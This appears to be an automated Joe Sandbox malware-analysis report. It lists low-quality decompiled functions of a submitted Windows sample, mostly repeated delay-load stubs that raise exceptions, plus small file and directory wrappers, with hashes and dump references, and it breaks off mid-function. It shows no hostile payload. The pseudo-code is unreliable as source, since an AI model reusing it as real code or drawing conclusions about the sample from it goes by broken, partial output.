Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2194d431f613681152cab9b327d3c086d6d45a27bce6790db547b913572695d1
Instruction ID: d3f12572d92d402ef670bda39a02aec5a145d0479a29a6080864ab84c310d7c7
Opcode Fuzzy Hash: 2194d431f613681152cab9b327d3c086d6d45a27bce6790db547b913572695d1
Instruction Fuzzy Hash: E7A011822AE802BE300833222C02CBA82CCC0CAB203308AEEB202800A0B8C80C008032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDA4D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBDA4D() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdae24); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbda26
0x00bbda2b
0x00bbda32

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBDA2B

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5f99070702545181b61f5fba698a7628db71c9b5142b6cf6929233429372cd96
Instruction ID: d3f12572d92d402ef670bda39a02aec5a145d0479a29a6080864ab84c310d7c7
Opcode Fuzzy Hash: 5f99070702545181b61f5fba698a7628db71c9b5142b6cf6929233429372cd96
Instruction Fuzzy Hash: E7A011822AE802BE300833222C02CBA82CCC0CAB203308AEEB202800A0B8C80C008032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD7BB Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD7BB() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3bf53e0b8b8e1ebbdf46ecf5ab96a4882d15715b661fc82f57158e692d953a18
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: 3bf53e0b8b8e1ebbdf46ecf5ab96a4882d15715b661fc82f57158e692d953a18
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD7B1 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD7B1() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cad0e5d55ed388c6eccc6f51af4eccabc2c3984e3225a26e44aabb4462ead660
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: cad0e5d55ed388c6eccc6f51af4eccabc2c3984e3225a26e44aabb4462ead660
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD7A7 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD7A7() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7969c74a523d231e25421b116f9ac222559006ba701aa4a85e05c7cab3329fcd
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: 7969c74a523d231e25421b116f9ac222559006ba701aa4a85e05c7cab3329fcd
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD793 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD793() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8de75f0a01128c365da82fae03e1c45f9df374f064a7c4f4bf0b257c1d30d240
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: 8de75f0a01128c365da82fae03e1c45f9df374f064a7c4f4bf0b257c1d30d240
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD7ED Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD7ED() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d794942966e902d95d7f5abc7dd4de1a5bfc67021398e534dbb190bc54a6201
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: 6d794942966e902d95d7f5abc7dd4de1a5bfc67021398e534dbb190bc54a6201
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD7E3 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD7E3() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2ccdaa277240106736f03af2e3a3e8b09eae75047d265c8aa073d7bda52072da
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: 2ccdaa277240106736f03af2e3a3e8b09eae75047d265c8aa073d7bda52072da
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD7D9 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD7D9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ece3022601cb4541e6511fce34a2e08ce400550cf1e3c04e8805cc8c399a888c
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: ece3022601cb4541e6511fce34a2e08ce400550cf1e3c04e8805cc8c399a888c
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD7C5 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD7C5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1b72f936b9c746c442b3e52522de52cc7725b94a767cd4201ca91126b1b59ff6
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: 1b72f936b9c746c442b3e52522de52cc7725b94a767cd4201ca91126b1b59ff6
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD72F Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD72F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7a9e8f488138aa0fb070cf998a597cd6b98c1bd93b390e186c4d7b7467763cdc
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: 7a9e8f488138aa0fb070cf998a597cd6b98c1bd93b390e186c4d7b7467763cdc
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD775 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00BBD775() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xbdada4); // executed
				E00BBDDAF(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}

0x00bbd6f4
0x00bbd6f9
0x00bbd700

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BBD6F9

Part of subcall function 00BBDDAF: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BBDE2C
Part of subcall function 00BBDDAF: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BBDE3D

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2d206ea046a05db40b9a571d52f36c15436c0b2b7389263916fa09d9f39fc054
Instruction ID: 7bab847a3e553a6af86d3fbcdde224700a60aa77a2ead54f43588daa96f77798
Opcode Fuzzy Hash: 2d206ea046a05db40b9a571d52f36c15436c0b2b7389263916fa09d9f39fc054
Instruction Fuzzy Hash: 6BA011C22AA002BE30882220AC02CBA028CC8E0BA233088EAB002800A0B8CC08000032

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9DFF Relevance: 1.5, APIs: 1, Instructions: 7
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BA9DFF(void* __ecx) {
				int _t2;

				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
				asm("sbb eax, eax");
				return  ~(_t2 - 1) + 1;
			}

0x00ba9e02
0x00ba9e0b
0x00ba9e0e

APIs

SetEndOfFile.KERNELBASE(?,00BA90AB,?,?,-00001960), ref: 00BA9E02

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 7ba0f88b61850bcf0159d5ac8eac2aef04e08c0cbf83b8c21e87d098d7393881
Instruction ID: 231b293e984cb5c81473a94c476ea44172738529f565f8cef6c29d7bcea0b937
Opcode Fuzzy Hash: 7ba0f88b61850bcf0159d5ac8eac2aef04e08c0cbf83b8c21e87d098d7393881
Instruction Fuzzy Hash: F3B012300A1045468E002B30CC144147F11E62130630081606002C6064DF12C0039600

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA2A0 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BBA2A0(WCHAR* _a4) {
				signed int _t2;

				_t2 = SetCurrentDirectoryW(_a4); // executed
